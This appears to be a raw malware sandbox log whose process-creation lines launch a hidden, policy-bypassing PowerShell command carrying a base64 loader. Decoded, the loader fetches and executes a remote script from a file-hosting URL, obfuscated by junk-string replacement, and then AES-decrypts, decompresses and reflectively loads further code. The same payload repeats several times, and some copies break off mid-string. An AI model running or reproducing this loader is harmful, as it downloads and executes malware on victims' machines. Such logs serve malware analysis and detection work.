CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 